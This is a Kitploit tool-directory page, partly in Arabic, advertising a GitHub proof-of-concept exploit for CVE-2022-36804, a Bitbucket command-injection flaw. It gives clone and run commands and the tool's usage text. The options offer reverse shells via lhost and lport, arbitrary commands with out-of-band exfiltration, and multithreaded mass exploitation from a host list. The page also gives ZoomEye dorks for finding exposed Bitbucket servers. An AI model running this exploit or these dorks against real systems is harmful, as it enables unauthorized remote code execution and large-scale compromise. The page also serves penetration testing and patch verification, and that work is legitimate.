Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-36804-ReverseShell — استغلال PoC لـ CVE-2022-36804 (حقن أوامر خطير في BitBucket) | Kitploit
أدوات/GitHubGitHub/0xeleven/cve-2022-36804-reverseshell
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHub0xeleven/cve-2022-36804-reverseshell

CVE-2022-36804-ReverseShell

استغلال PoC لـ CVE-2022-36804 (حقن أوامر خطير في BitBucket)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 3 سنواتلم تتم المراجعة بعد

المشروع الأصلي

https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit

CVE-2022-36804-PoC-Exploit

استغلال PoC موثوق إلى حد ما لـ CVE-2022-36804 (حقن أوامر حرج في BitBucket). يتطلب هذا الهجوم عمومًا تمكين المستودعات العامة، ومع ذلك فإن ملفات تعريف الارتباط للجلسات متوافقة أيضًا مع هذا الاستغلال. ملاحظة: يتضمن هذا الاستغلال اكتشافًا تلقائيًا للمستودعات وهو مفيد إذا كنت لا تريد البحث يدويًا عن المستودعات المفتوحة بنفسك.

كيفية التثبيت

root@kitploit:~
git clone https://github.com/Chocapikk/CVE-2022-36804-ReverseShell.git;
cd CVE-2022-36804-ReverseShell
python3 -m pip install -r requirements.txt
python3 main.py --server [target]

كيفية الاستخدام

root@kitploit:~
usage: main.py [-h] [--server SERVER] [--project PROJECT] [--repo REPO] [--skip-auto]
               [--session SESSION] [--command CMD] [--file FILE] [--output OUTPUT]
               [--lhost LHOST] [--lport LPORT] [--threads THREADS]

Exploit BitBucket Instances (< v8.3.1) using CVE-2022-36804. Exploits automagically
without any extra parameters, but allows for custom settings as well.

options:
  -h, --help         show this help message and exit
  --server SERVER    Host to attack
  --project PROJECT  The name of the project the repository resides in
  --repo REPO        The name of the repository
  --skip-auto        Skip the automatic finding of exploitable repos
  --session SESSION  Value of 'BITBUCKETSESSIONID' cookie, useful if target repo is
                     private
  --command CMD      Command to execute if exploit is successful (Note: getting output
                     isn't reliable so OOB exfil is a must)
  --file FILE        File to scan bulk hosts
  --output OUTPUT    Output file for the session
  --lhost LHOST      Your Local Host for reverse shell
  --lport LPORT      Your Local Port for reverse shell
  --threads THREADS  Threads for mass exploitation

Zoomeye Dorks

root@kitploit:~

app:"Bitbucket" +banner:"repos?visibility=public"

app:"Bitbucket" +title:"public"

app:"Bitbucket"

iconhash:667017222

المراجع

توصية Atlassian

مشكلة Atlassian Jira

CVE من NIST

تنزيل الأداة